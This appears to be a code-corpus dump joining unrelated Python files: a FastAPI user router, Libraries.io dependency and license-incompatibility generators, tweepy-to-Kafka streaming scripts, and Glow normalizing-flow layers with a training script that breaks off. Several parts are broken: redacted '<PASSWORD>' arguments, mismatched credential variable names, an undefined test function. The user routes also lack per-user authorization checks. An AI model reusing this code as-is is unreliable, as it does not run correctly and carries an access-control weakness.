from urlman.web.api.users.exceptions import UserNotFoundException
from urlman.web.api.users.repos.selectors import (
get_current_user,
get_user_by_id,
get_user_by_username,
get_users,
)
from urlman.web.api.users.repos.services import (
change_user_password,
delete_user,
register_user,
soft_delete_user,
update_user,
)
from urlman.web.api.users.schemas import (
UserChangePassword,
UserCredentials,
UserExtended,
UserIn,
UserOut,
UserUpdate,
)
router = APIRouter()
@router.get("/profile", response_model=UserExtended, status_code=200)
async def profile(
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Get current User profile."""
return await get_user_by_id(
user_id=current_user.id,
session=session,
)
@router.get("/{user_id}", response_model=UserExtended, status_code=200)
async def get_single_user(
user_id: str,
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Get single User."""
try:
user = await get_user_by_id(user_id=user_id, session=session)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
if user is None:
raise UserNotFoundException()
return user
@router.get("", response_model=LimitOffsetPage[UserOut], status_code=200)
async def get_list_users(
session: AsyncSession = Depends(get_db_session),
current_user: UserModel = Depends(get_current_user),
):
"""Get list of undeleted active Users."""
users = await get_users(
session=session,
)
return paginate(users)
@router.post("/register", response_model=UserOut, status_code=201)
async def create_user(
user: UserIn,
session: AsyncSession = Depends(get_db_session),
):
"""Create new User."""
try:
user = await register_user(user=user, session=session)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
return user
@router.post("/login", status_code=200, response_model=AccessToken)
async def login(
user_credentials: UserCredentials,
session: AsyncSession = Depends(get_db_session),
):
"""Get User token."""
try:
user = await get_user_by_username(
username=user_credentials.username,
session=session,
)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
if user is None:
raise UserNotFoundException()
if not verify_password(
db_password=<PASSWORD>,
verifiable_password=<PASSWORD>,
):
raise UserNotFoundException()
access_token = jwt_auth.encode_token(username=user.username)
return AccessToken(access_token=access_token)
@router.patch("/change_password", status_code=200)
async def change_password(
user_credentials: UserChangePassword,
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Change current user password."""
try:
await change_user_password(
user=current_user,
creds=user_credentials,
session=session,
)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
@router.patch("/{user_id}", response_model=UserOut, status_code=200)
async def update_single_user(
user_id: str,
data: UserUpdate,
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Update User info."""
try:
user = await update_user(
user_id=user_id,
data=data,
session=session,
)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
if user is None:
raise UserNotFoundException()
return user
@router.patch("/{user_id}/soft_delete", status_code=204)
async def delete_user_soft(
user_id: str,
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Soft delete user."""
try:
await soft_delete_user(
user_id=user_id,
session=session,
)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
@router.delete("/{user_id}", status_code=200)
async def delete_user_hard(
user_id: str,
current_user: UserModel = Depends(get_current_user),
session: AsyncSession = Depends(get_db_session),
):
"""Delete User."""
try:
await delete_user(
user_id=user_id,
session=session,
)
except IntegrityError as ie:
raise HTTPException(status_code=400, detail=str(ie.orig))
```
#### File: urlman/web/lifetime.py
```python
from asyncio import current_task
from typing import Awaitable, Callable
from fastapi import FastAPI
from sqlalchemy.ext.asyncio import (
AsyncSession,
async_scoped_session,
create_async_engine,
)
from sqlalchemy.orm import sessionmaker
from urlman.settings import settings
def _setup_db(app: FastAPI) -> None:
"""
Create connection to the database.
This function creates SQLAlchemy engine instance,
session_factory for creating sessions
and stores them in the application's state property.
:param app: fastAPI application.
"""
engine = create_async_engine(str(settings.db_url), echo=settings.db_echo)
session_factory = async_scoped_session(
sessionmaker(
engine,
expire_on_commit=False,
class_=AsyncSession,
),
scopefunc=current_task,
)
app.state.db_engine = engine
app.state.db_session_factory = session_factory
def startup(app: FastAPI) -> Callable[[], Awaitable[None]]:
"""
Actions to run on application startup.
This function use fastAPI app to store data,
such as db_engine.
:param app: the fastAPI application.
:return: function that actually performs actions.
"""
async def _startup() -> None:
_setup_db(app)
return _startup
def shutdown(app: FastAPI) -> Callable[[], Awaitable[None]]:
"""
Actions to run on application's shutdown.
:param app: fastAPI application.
:return: function that actually performs actions.
"""
async def _shutdown() -> None:
await app.state.db_engine.dispose()
return _shutdown
``` |
{
"source": "4lgn/license-incompatibility",
"score": 2
} |
#### File: experiment/generator/dependencies.py
```python
import csv
import gzip
import re
import os
def generate(dbmsImportPath, librariesIoDataPath, cutoff = -1, filterProjects = set()):
print('Opening and writing dependency header files...')
projectsDependenciesHeaderFile = open(os.path.join(dbmsImportPath, 'project-dependencies_header.csv'), "w+", encoding="utf-8")
versionDependenciesHeaderFile = open(os.path.join(dbmsImportPath, 'version-dependencies_header.csv'), "w+", encoding="utf-8")
projectsDependenciesHeaderFile.write('projectId:START_ID(Project),dependencyProjectId:END_ID(Project)')
versionDependenciesHeaderFile.write('versionId:START_ID(Version),dependencyRequirement,dependencyProjectId:END_ID(Project)')
projectsDependenciesHeaderFile.close()
versionDependenciesHeaderFile.close()
print('Opening dependency files...')
projectDependenciesFile = open(os.path.join(dbmsImportPath, 'project-dependencies.csv'), "w", encoding="utf-8")
versionDependenciesFile = open(os.path.join(dbmsImportPath, 'version-dependencies.csv'), "w", encoding="utf-8")
relationSet = set()
print('Generating dependencies...')
with open(os.path.join(librariesIoDataPath, "dependencies-1.6.0-2020-01-12.csv"), "r", encoding="utf-8") as f:
reader = csv.reader(f)
dependenciesWritten = 0
line_count = 0
cyclicDependencies = 0
optionalDependencies = 0
# skip first header line
next(reader)
for row in reader:
if (cutoff != -1 and line_count > cutoff):
break
line_count += 1
if (line_count % 500000 == 0):
print(line_count)
projectId = row[3]
dependencyVersion = row[4]
dependencyVersionId = row[5]
dependencyKind = row[8]
optionalDependency = row[9]
dependencyReqs = row[10]
dependencyProjectId = row[11]
# Skip cyclic dependencies
if (projectId == dependencyProjectId):
cyclicDependencies += 1
continue
# Skip optional dependency
if (optionalDependency == 'true'):
optionalDependencies += 1
continue
# If we have filterProjects defined, skip all projects we don't have in our filter
if (len(filterProjects) > 0 and (not (filterProjects.__contains__(projectId) or filterProjects.__contains__(dependencyProjectId)))):
continue
if (not dependencyKind in ['runtime','RUNTIME', 'compile', 'COMPILE', 'provided', 'normal', 'build', 'imports', 'import', 'configure', 'depends', 'system']):
continue
if (projectId and dependencyProjectId and dependencyVersion and dependencyKind):
dependenciesWritten += 1
dependencyReqVersionFiltered = dependencyReqs.replace('"', "'")
versionDependenciesFile.write(f'{dependencyVersionId},"{dependencyReqVersionFiltered}",{dependencyProjectId}\n')
if (dependencyProjectId.isnumeric()):
if (not relationSet.__contains__((projectId, dependencyProjectId))):
relationSet.add((projectId, dependencyProjectId))
projectDependenciesFile.write(f'{projectId},{dependencyProjectId}\n')
print(f'Generated {dependenciesWritten} dependency nodes (skipped {line_count - dependenciesWritten})...')
print(f'... with {cyclicDependencies} of them being cyclic dependencies and {optionalDependencies} being optional (skipped)')
versionDependenciesFile.close()
projectDependenciesFile.close()
```
#### File: experiment/generator/licensesPermutations.py
```python
import csv
import gzip
import os
def generate(dbmsImportPath, librariesIoDataPath):
print('Opening and writing the license incompatibility header file...')
licenseIncompHeaderFile = open(os.path.join(dbmsImportPath, 'license-incompatibilities_header.csv'), "w", encoding="utf-8")
licenseIncompHeaderFile.write('licenseId:START_ID(License),isIncompatibleWithLicenseId:END_ID(License)')
licenseIncompHeaderFile.close()
print('Opening license the license incompatibility file...')
licenseIncompFile = open(os.path.join(dbmsImportPath, 'license-incompatibilities.csv'), "w", encoding="utf-8")
permissive = [
"MIT", "MIT-feh", "MIT-0",
"MITNFA", "MIT-CMU", "X11",
"BSD-2-Clause", "BSD-2-Clause-FreeBSD", "BSD-2-Clause-NetBSD",
"BSD-3-Clause", "BSD-3-Clause-Attribution", "BSD-3-Clause-Clear",
"BSD-3-Clause-No-Nuclear-Warranty", "BSD-3-Clause-No-Nuclear-License",
"BSD-3-Clause-LBNL", "Apache-2.0", "Apache-1.0",
"Apache-1.1", "Zlib", "zlib-acknowledgement",
"Libpng"
]
weakCopy = [
"MPL-1.1", "MPL-2.0", "LGPL-3.0",
"LGPL-2.1", "LGPL-2.0", "LGPL-3.0+",
"LGPL-3.0-only", "LGPL-2.0+", "LGPL-2.1+",
"LGPL-2.0-only", "LGPL-2.0-or-later", "LGPL-2.1-only",
"LGPL-3.0-or-later", "LGPL-2.1-or-later"
]
strongCopy = [
"GPL-2.0", "GPL-3.0", "GPL-3.0-only",
"GPL-3.0-or-later", "GPL-2.0+", "GPL-2.0-with-font-exception",
"GPL-3.0+", "GPL-2.0-only", "GPL-2.0-or-later",
"GPL-1.0-or-later", "GPL-1.0+", "GPL-2.0-with-classpath-exception",
"GPL-3.0-with-GCC-exception", "GPL-2.0-with-GCC-exception", "GPL-1.0",
"GPL-3.0-with-autoconf-exception", "AGPL-3.0", "AGPL-3.0-or-later",
"AGPL-1.0", "AGPL-3.0-only"
]
lgplVariations = [
"LGPL-3.0", "LGPL-2.1", "LGPL-2.0",
"LGPL-3.0+", "LGPL-3.0-only", "LGPL-2.0+",
"LGPL-2.1+", "LGPL-2.0-only", "LGPL-2.0-or-later",
"LGPL-2.1-only", "LGPL-3.0-or-later", "LGPL-2.1-or-later"
]
print("Mapping found project licenses to their ids")
licensesIdMap = dict()
with open(os.path.join(dbmsImportPath, 'licenses.csv'), "r", encoding="utf-8") as f:
reader = csv.reader(f)
for row in reader:
licenseId = row[0]
name = row[1]
licensesIdMap[name] = licenseId
print("Mapped " + str(len(licensesIdMap.keys())) + " licenses")
line_count = 0
print('Generating license incompatibility relationships...')
# all permissive is incompatible with strong copyleft
for p in permissive:
# Can uncomment this if we want permissive to also be incompatible with weak copyleft
# for w in weakCopy:
# if (p in licensesIdMap and w in licensesIdMap):
# line_count += 1
# license1Id = licensesIdMap[p]
# license2Id = licensesIdMap[w]
# licenseIncompFile.write(f'{license1Id},{license2Id}\n')
for s in strongCopy:
if (p in licensesIdMap and s in licensesIdMap):
line_count += 1
license1Id = licensesIdMap[p]
license2Id = licensesIdMap[s]
licenseIncompFile.write(f'{license1Id},{license2Id}\n')
# MPLv1.1 is incompatible with LGPL
for lgpl in lgplVariations:
if (lgpl in licensesIdMap):
line_count += 1
licenseId = licensesIdMap[lgpl]
licenseIncompFile.write(f'70,{licenseId}\n')
print(f'Generated {line_count} possible license incompatibilities...')
```
#### File: experiment/generator/projects.py
```python
import csv
import gzip
import os
def generate(dbmsImportPath, librariesIoDataPath, cutoff = -1, filterProjects = set()):
print('Opening and writing project header files...')
projectsHeaderFile = open(os.path.join(dbmsImportPath, 'projects_header.csv'), "w+", encoding="utf-8")
licensesHeaderFile = open(os.path.join(dbmsImportPath, 'licenses_header.csv'), "w+", encoding="utf-8")
projectLicensesHeaderFile = open(os.path.join(dbmsImportPath, 'project-licenses_header.csv'), "w+", encoding="utf-8")
projectsHeaderFile.write('projectId:ID(Project),platform,name,dependentRepositoriesCount')
licensesHeaderFile.write('licenseId:ID(License),name')
projectLicensesHeaderFile.write('projectId:START_ID(Project),licenseId:END_ID(License)')
projectsHeaderFile.close()
licensesHeaderFile.close()
projectLicensesHeaderFile.close()
print('Opening project files...')
projectsFile = open(os.path.join(dbmsImportPath, 'projects.csv'), "w", encoding="utf-8")
licensesFile = open(os.path.join(dbmsImportPath, 'licenses.csv'), "w", encoding="utf-8")
projectLicensesFile = open(os.path.join(dbmsImportPath, 'project-licenses.csv'), "w", encoding="utf-8")
licensesMap = {}
licensesId = 0
print('Generating projects...')
with open(os.path.join(librariesIoDataPath, "projects-1.6.0-2020-01-12.csv"), "r", encoding="utf-8") as f:
reader = csv.reader(f)
projectsWritten = 0
dualLicensedProjects = 0
line_count = 0
# skip first header line
next(reader)
for row in reader:
if (cutoff != -1 and line_count > cutoff):
break
line_count += 1
if (line_count % 500000 == 0):
print(line_count)
index = row[0]
platform = row[1]
name = row[2]
licenses = row[8]
dependentRepositoriesCount = row[19]
# Skip all projects that we should filter
if (len(filterProjects) > 0 and (not filterProjects.__contains__(index))):
continue
projectNameFiltered = name.replace('"', "'")
if (licenses):
licenseArr = licenses.split(',')
# Skip licensing dual-licensed projects (we still need the
# project nodes for dependency chains, but we cannot answer
# anything with regards to their license because we have no
# idea which parts of the software are licensed under which
# license)
if (len(licenseArr) == 1):
license = licenseArr[0]
if (not license in licensesMap):
licensesMap[license] = licensesId
licensesFile.write(f'{licensesId},{license}\n')
licensesId += 1
licenseId = licensesMap.get(license)
projectLicensesFile.write(f'{index},{licenseId}\n')
else:
dualLicensedProjects += 1
projectsWritten += 1
projectsFile.write(f'{index},{platform},"{projectNameFiltered}",{dependentRepositoriesCount}\n')
print(f'Generated {projectsWritten} project nodes (skipped {line_count - projectsWritten}) with {dualLicensedProjects} of them being dual-licensed, and {licensesId} unique licenses...')
projectsFile.close()
licensesFile.close()
projectLicensesFile.close()
``` |
{
"source": "4lick/TweetActivityWithBeam",
"score": 3
} |
#### File: tweets-file/src/basic.py
```python
from __future__ import absolute_import, print_function
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
# Consumer key and secret
consumer_key="YOUR_CONSUMER_KEY"
CONSUMER_secret="YOUR_CONSUMER_SECRET"
# Access token
access_token="YOUR_ACCESS_TOKEN"
access_token_secret="ACCESS_TOKEN_SECRET"
f = open('tweets.json', 'w')
class StdOutListener(StreamListener):
""" A listener handles tweets that are received from the stream. """
def on_data(self, data):
print(data)
f.write(data + '\n')
return True
def on_error(self, status):
print(status)
f.close()
if __name__ == '__main__':
l = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, l)
stream.filter(track=['elections', 'presidentielles', 'france'])
```
#### File: tweets-kafka/src/basic.py
```python
from __future__ import absolute_import, print_function
from tweepy.streaming import StreamListener
from tweepy import OAuthHandler
from tweepy import Stream
from kafka import KafkaProducer
from kafka.errors import KafkaError
import json
import datetime
# Consumer key and secret
consumer_key="YOUR_CONSUMER_KEY"
CONSUMER_secret="YOUR_CONSUMER_SECRET"
# Access token
access_token="YOUR_ACCESS_TOKEN"
access_token_secret="ACCESS_TOKEN_SECRET"
# kafka producer
producer = KafkaProducer(bootstrap_servers=['kafka:9092'], value_serializer=lambda m: json.dumps(m).encode('utf-8'))
class StdOutListener(StreamListener):
""" A listener handles tweets that are received from the stream. """
def on_data(self, data):
try:
self.c += 1
except:
self.c = 0
if self.c % 10 == 0:
print("%s - %d tweets sent" % (datetime.datetime.utcnow(), self.c))
future = producer.send('tweets-topic', data)
try:
record_metadata = future.get(timeout=10)
except KafkaError:
# Decide what to do if produce request failed...
log.exception()
pass
return True
def on_error(self, status):
print(status)
if __name__ == '__main__':
l = StdOutListener()
auth = OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
stream = Stream(auth, l)
stream.filter(track=['elections', 'presidentielles', 'france'])
``` |
{
"source": "4liharandi/Cycle-Normalizing-Flow",
"score": 2
} |
#### File: 4liharandi/Cycle-Normalizing-Flow/glow_ops.py
```python
import tensorflow as tf
from tensorflow.keras import layers
import scipy
import numpy as np
from Unet_util import Unet
from my_utils import *
class upsqueeze(layers.Layer):
def __init__(self, factor=2):
super(upsqueeze, self).__init__()
self.f = factor
def call(self, x, reverse=False):
f = self.f
# upsampling via squeeze
b, N1, N2, nch = x.get_shape().as_list()
if not reverse:
x = tf.reshape(
tf.transpose(
tf.reshape(x, shape=[b, N1//f, f, N2//f, f, nch]),
[0, 1, 3, 2, 4, 5]),
[b, N1//f, N2//f, nch*f*f])
else:
x = tf.reshape(tf.transpose(
tf.reshape(x, shape=[b, N1, N2, f, f, nch//f**2]),
[0, 1, 3, 2, 4, 5]), [b, N1*f, N2*f, nch//f**2])
return x, 0.0
class actnorm(layers.Layer):
"""Activation normalization layers that
initialized via data"""
def __init__(self, **kwargs):
super(actnorm, self).__init__()
# assign checks for first call
self.assigned = False
def build(self, input_shape):
if len(input_shape) == 2:
self.b = self.add_weight(name='bias',
shape=(1, input_shape[1]),
trainable= True)
self.scale = self.add_weight(name='scale',
shape=(1, input_shape[1]),
trainable= True)
else:
self.b = self.add_weight(name='bias',
shape=(1, 1, 1, input_shape[3]),
trainable= True)
self.scale = self.add_weight(name='scale',
shape=(1, 1, 1, input_shape[3]),
trainable= True)
def call(self, x, reverse=False):
if len(x.shape) == 2:
red_axes = [0]
else:
red_axes = [0, 1, 2]
if not self.assigned:
"""https://github.com/tensorflow/tensor2tensor/blob/21dba2c1bdcc7ab582a2bfd8c0885c217963bb4f/tensor2tensor/models/research/glow_ops.py#L317"""
self.b.assign(-tf.reduce_mean(x, red_axes, keepdims=True))
x_var = tf.reduce_mean((x+self.b)**2, red_axes, keepdims=True)
init_value = tf.math.log(1.0/(tf.math.sqrt(x_var) + 1e-6))
self.scale.assign(init_value)
self.assigned = True
_, height, width, channels = x.get_shape().as_list()
if not reverse:
x += self.b
x *= tf.math.exp(self.scale)
else:
x *= tf.math.exp(-self.scale)
x -= self.b
log_s = self.scale
dlogdet = tf.reduce_sum(log_s)* \
tf.cast(height * width, log_s.dtype)
if reverse:
dlogdet *= -1
return x, dlogdet
class invertible_1x1_conv(layers.Layer):
"""Invertible 1x1 convolutional layers"""
def __init__(self, **kwargs):
super(invertible_1x1_conv, self).__init__()
self.type = kwargs.get('op_type', 'bijective')
self.gamma = kwargs.get('gamma', 0.0)
self.activation = kwargs.get('activation', 'linear')
def build(self, input_shape):
_, height, width, channels = input_shape
if self.type=='bijective':
random_matrix = np.random.randn(channels, channels).astype("float32")
np_w = scipy.linalg.qr(random_matrix)[0].astype("float32")
self.activation = 'linear'
self.LU = True
if self.LU:
np_p, np_l, np_u = scipy.linalg.lu(np_w)
np_s = np.diag(np_u)
np_sign_s = np.sign(np_s)
np_log_s = np.log(np.abs(np_s))
np_u = np.triu(np_u, k=1)
self.p = tf.Variable(np_p, name='P', trainable=False)
self.l = tf.Variable(np_l, name='L', trainable=True)
self.sign_s = tf.Variable(np_sign_s, name='sign_S',
trainable=False)
self.log_s = tf.Variable(np_log_s, name='log_S',
trainable=True)
self.u = tf.Variable(np_u, name='U',
trainable=True)
else:
self.w = tf.Variable(np_w, name='W', trainable=True)
else:
self.LU = False
if self.activation == 'linear':
random_matrix_1 = np.random.randn(channels//2, channels//2).astype("float32")
random_matrix_2 = np.random.randn(channels//2, channels//2).astype("float32")
np_w_1 = scipy.linalg.qr(random_matrix_1)[0].astype("float32")
np_w_2 = scipy.linalg.qr(random_matrix_2)[0].astype("float32")
np_w = np.concatenate([np_w_1, np_w_2], axis=0)/(np.sqrt(2.0))
elif self.activation == 'relu':
random_matrix_1 = np.random.randn(channels//2, channels//2).astype("float32")
np_w = scipy.linalg.qr(random_matrix_1)[0].astype("float32")
self.w = tf.Variable(np_w, name='W', trainable=True)
def call(self, x, reverse=False):
# If height or width cannot be statically determined then they end up as
# tf.int32 tensors, which cannot be directly multiplied with a floating
# point tensor without a cast.
_, height, width, channels = x.get_shape().as_list()
if self.type=='bijective':
if self.LU:
l_mask = tf.convert_to_tensor(np.tril(np.ones([channels, channels], dtype=np.float32), -1),
dtype=tf.float32)
l = self.l * l_mask + tf.eye(channels, channels)
u = self.u * tf.transpose(l_mask) + \
tf.linalg.diag(self.sign_s * tf.math.exp(self.log_s))
self.w = tf.matmul(self.p, tf.matmul(l, u))
objective = tf.reduce_sum(self.log_s) * \
tf.cast(height * width, self.log_s.dtype)
else:
s = tf.linalg.svd(self.w,
full_matrices=False, compute_uv=False)
self.log_s = tf.math.log(s + self.gamma**2/(s + 1e-8))
objective = tf.reduce_sum(self.log_s) * \
tf.cast(height * width, self.log_s.dtype)
else:
# s = tf.linalg.svd(self.w,
# full_matrices=False, compute_uv=False)
# self.log_s = tf.math.log(s + self.gamma**2/(s + 1e-8))
objective = 0.0
if not reverse:
if self.activation == 'relu':
x = x[:,:,:,:channels//2] - x[:,:,:,channels//2:]
w = tf.reshape(self.w , [1, 1] + self.w.get_shape().as_list())
x = tf.nn.conv2d(x, w, [1, 1, 1, 1], "SAME", data_format="NHWC")
else:
if self.activation=='relu':
prefactor = tf.matmul(self.w, self.w, transpose_a=True) + \
self.gamma**2*tf.eye(tf.shape(self.w)[1])
w_inv = tf.matmul(tf.linalg.inv(prefactor), self.w, transpose_b=True)
conv_filter = tf.concat([w_inv, -w_inv], axis=1)
conv_filter = tf.reshape(conv_filter, [1, 1] + conv_filter.get_shape().as_list())
x = tf.nn.conv2d(x, conv_filter, [1, 1, 1, 1], "SAME", data_format="NHWC")
x = tf.nn.relu(x)
else:
if self.LU == True:
perm = tf.argmax(self.p , axis = 0)
lower_upper = l + u - tf.eye(channels)
w_inv = tf.linalg.lu_matrix_inverse(lower_upper=lower_upper , perm = perm)
else:
prefactor = tf.matmul(self.w, self.w, transpose_a=True) + \
self.gamma**2*tf.eye(tf.shape(self.w)[1])
w_inv = tf.matmul( tf.linalg.inv(prefactor) , self.w, transpose_b=True)
conv_filter = w_inv
conv_filter = tf.reshape(conv_filter, [1, 1] + conv_filter.get_shape().as_list())
x = tf.nn.conv2d(x, conv_filter, [1, 1, 1, 1], "SAME", data_format="NHWC")
objective *= -1
return x, objective
class conv_stack(layers.Layer):
def __init__(self, mid_channels,
output_channels):
super(conv_stack, self).__init__()
self.conv1 = layers.Conv2D(
mid_channels, 3, 1, padding='same',
activation='relu', use_bias=False)
self.conv2 = layers.Conv2D(
mid_channels, 1, 1, padding='same',
activation='relu', use_bias=False)
self.conv3 = layers.Conv2D(
output_channels, 1, 1, padding='same', activation='sigmoid', use_bias=False,kernel_initializer='zeros')
def call(self, x):
return self.conv3(self.conv2(self.conv1(x)))
class affine_coupling(layers.Layer):
def __init__(self):
super(affine_coupling, self).__init__()
def build(self, input_shape):
out_channels = input_shape[-1]
self.conv_stack = conv_stack(128,out_channels) # regular convolutions
# self.conv_stack = Unet(out_channels) # Unet conv stack
def call(self, x, reverse=False):
x1, x2 = tf.split(x, num_or_size_splits=2, axis=-1)
z1 = x1
log_scale_and_shift = self.conv_stack(z1)
shift = log_scale_and_shift[:, :, :, 0::2]
scale = tf.math.exp(log_scale_and_shift[:, :, :, 1::2])
if not reverse:
z2 = (x2 + shift) *scale
else:
z2 = (x2/scale) - shift
objective = tf.reduce_sum(log_scale_and_shift[:, :, :, 1::2], axis=[1, 2, 3])
# objective = 0.0
if reverse:
objective *= -1
return tf.concat([z1, z2], axis=3), objective
class revnet_step(layers.Layer):
"""One layer of this is:
[1] Actnorm -- data normalization
[2] 1x1 conv -- permutation
[3] coupling layer -- Jacobian
"""
def __init__(self, **kwargs):
super(revnet_step, self).__init__()
self.layer_type = kwargs.get('layer_type', 'bijective')
self.mid_ch = kwargs.get('mid_channels', 128)
self.latent_model = kwargs.get('latent_model', False)
self.activation = kwargs.get('activation', 'linear')
self.norm = actnorm()
gamma = 1e-3 if self.latent_model else 1e-3
self.conv = invertible_1x1_conv(
op_type=self.layer_type , activation = self.activation , gamma = gamma)
self.coupling_layer = affine_coupling()
def call(self, x, reverse=False):
obj = 0.0
ops = [self.norm, self.conv, self.coupling_layer]
if reverse:
ops = ops[::-1]
for op in ops:
x, curr_obj = op(x, reverse=reverse)
obj += curr_obj
return x, obj
class revnet(layers.Layer):
"""Composition of revnet steps"""
def __init__(self, **kwargs):
super(revnet, self).__init__()
self.depth = kwargs.get('depth', 3)
self.latent_model = kwargs.get('latent_model', False)
self.steps = [revnet_step(layer_type = 'bijective',
latent_model = self.latent_model ,
activation = 'linear')
for _ in range(self.depth)]
def call(self, x, reverse=False):
objective = 0.0
if reverse:
steps = self.steps[::-1]
else:
steps = self.steps
for i in range(self.depth):
step = steps[i]
x, curr_obj = step(x,reverse=reverse)
objective += curr_obj
return x, objective
def unit_test_revnet_step():
MSE = tf.keras.losses.MeanSquaredError()
z = np.random.rand(10, 6, 6 , 12)
z = tf.convert_to_tensor(z , tf.float32)
rev = revnet(depth = 4)
x = rev(z , reverse = True)[0]
zhat = rev(x , reverse = False)[0]
tf.print(MSE(z, zhat))
if __name__ == '__main__':
unit_test_ICL()
unit_test_revnet_step()
```
#### File: 4liharandi/Cycle-Normalizing-Flow/train_bijective.py
```python
from my_models import generator, latent_generator
import tensorflow_probability as tfp
import tensorflow as tf
from tensorflow.keras import layers
import numpy as np
import cv2
from my_utils import *
import os
import shutil
from time import time
tfb = tfp.bijectors
tfd = tfp.distributions
FLAGS, unparsed = flags()
num_epochs = FLAGS.num_epochs
batch_size = FLAGS.batch_size
dataset = FLAGS.dataset
lr = FLAGS.lr
gpu_num = FLAGS.gpu_num
learntop = bool(FLAGS.learntop)
remove_all = bool(FLAGS.remove_all)
desc = FLAGS.desc
ml_threshold = FLAGS.ml_threshold
model_depth = FLAGS.model_depth
latent_depth = FLAGS.latent_depth
inv_conv_activation = FLAGS.inv_conv_activation
T = FLAGS.T
all_experiments = 'experiment_results/'
if os.path.exists(all_experiments) == False:
os.mkdir(all_experiments)
# experiment path
exp_path = all_experiments + 'Bijective_' + \
dataset + '_' + 'model_depth_%d' % (model_depth,) + '_' + 'latent_depth_%d'% (latent_depth,) + '_learntop_%d' \
% (int(learntop)) + '_' + desc
if os.path.exists(exp_path) == True and remove_all == True:
shutil.rmtree(exp_path)
if os.path.exists(exp_path) == False:
os.mkdir(exp_path)
gpus = tf.config.experimental.list_physical_devices('GPU')
if gpus:
# Restrict TensorFlow to only use the first GPU
try:
tf.config.experimental.set_visible_devices(gpus[gpu_num], 'GPU')
tf.config.experimental.set_memory_growth(gpus[gpu_num], True)
except RuntimeError as e:
# Visible devices must be set before GPUs have been initialized
print(e)
class Prior(layers.Layer):
"""Defines the low dimensional distribution as Guassian"""
def __init__(self, **kwargs):
super(Prior, self).__init__()
latent_dim = kwargs.get('latent_dim', 64)
self.mu = tf.Variable(tf.zeros(latent_dim),
dtype=tf.float32, trainable=learntop)
self.logsigma = tf.Variable(tf.zeros(latent_dim),
dtype=tf.float32, trainable=learntop)
self.prior = tfd.MultivariateNormalDiag(
self.mu, tf.math.exp(self.logsigma))
def latent_space_interplotion(model, x1, x2, latent=True , sample_number = 16):
"""Creates a grid of images from x1 to x2"""
if not latent:
"""if latent then x1 and x2 are treated to be latent codes"""
z1, _ = model(x1, reverse=True)
z2, _ = model(x2, reverse=True)
else:
z1 = x1
z2 = x2
# create a grid of latent codes
a = tf.cast(tf.reshape(tf.linspace(0, 1, sample_number), (sample_number, 1)), tf.float32)
z = z1 + a * (z2 - z1)
xhat = model(z, reverse= True)[0]
return xhat.numpy()
def train(num_epochs,
batch_size,
dataset,
lr,
exp_path,):
# Print the experiment setup:
print('Experiment setup:')
print('---> num_epochs: {}'.format(num_epochs))
print('---> batch_size: {}'.format(batch_size))
print('---> dataset: {}'.format(dataset))
print('---> Learning rate: {}'.format(lr))
print('---> experiment path: {}'.format(exp_path))
if os.path.exists(os.path.join(exp_path, 'logs')):
shutil.rmtree(os.path.join(exp_path, 'logs'))
ML_log_dir = os.path.join(exp_path, 'logs', 'ML')
ML_summary_writer = tf.summary.create_file_writer(ML_log_dir)
ML_loss_metric = tf.keras.metrics.Mean('ML_loss', dtype=tf.float32)
pz_log_dir = os.path.join(exp_path, 'logs', 'pz')
pz_summary_writer = tf.summary.create_file_writer(pz_log_dir)
pz_metric = tf.keras.metrics.Mean(
'pz', dtype=tf.float32)
jacobian_log_dir = os.path.join(exp_path, 'logs', 'jacobian')
jacobian_summary_writer = tf.summary.create_file_writer(jacobian_log_dir)
jacobian_metric = tf.keras.metrics.Mean(
'jacobian', dtype=tf.float32)
train_dataset , test_dataset = Dataset_preprocessing(dataset=dataset ,batch_size = batch_size)
print('Dataset is loaded: training and test dataset shape: {} {}'.
format(np.shape(next(iter(train_dataset))), np.shape(next(iter(test_dataset)))))
_ , image_size , _ , c = np.shape(next(iter(train_dataset)))
latent_dim = image_size * image_size * c
initial_learning_rate = lr
# steps = num_epochs * ( 60000//batch_size)
# print(lr)
# lr_schedule = tf.keras.optimizers.schedules.ExponentialDecay(
# initial_learning_rate,
# decay_steps=steps//2,
# decay_rate=0.3,
# staircase=True)
f_optimizer = tf.keras.optimizers.Adam(learning_rate=lr)
pz = Prior(latent_dim = latent_dim)
time_vector = np.zeros([num_epochs,1]) # time per epoch
latent_model = latent_generator(network = 'bijective',revnet_depth = latent_depth,
c = c,
image_size = image_size) # Bijective network
# call generator once to set weights (Data dependent initialization)
dummy_x = next(iter(train_dataset))
dummy_z , _ = latent_model(dummy_x, reverse=False)
ckpt = tf.train.Checkpoint(pz = pz,latent_model=latent_model,f_optimizer=f_optimizer)
manager = tf.train.CheckpointManager(
ckpt, os.path.join(exp_path, 'checkpoints'), max_to_keep=5)
ckpt.restore(manager.latest_checkpoint)
@tf.function
def train_step_ml(sample):
"""ML training of the Injective network"""
with tf.GradientTape() as tape:
latent_sample, obj = latent_model(sample, reverse=False)
p = -tf.reduce_mean(pz.prior.log_prob(latent_sample))
j = -tf.reduce_mean(obj) # Log-det of Jacobian
loss = p + j
variables = tape.watched_variables()
grads = tape.gradient(loss, variables)
f_optimizer.apply_gradients(zip(grads, variables))
return loss , p , j
if manager.latest_checkpoint:
print("Restored from {}".format(manager.latest_checkpoint))
else:
print("Initializing from scratch.")
for epoch in range(num_epochs):
epoch_start = time()
# ML training of the bijective network after ml threshold epochs
for x in train_dataset:
ml_loss , p , j = train_step_ml(x)
if epoch == 0:
# Just for the first iteration of the first epoch
# to calculate the number of trainable parametrs
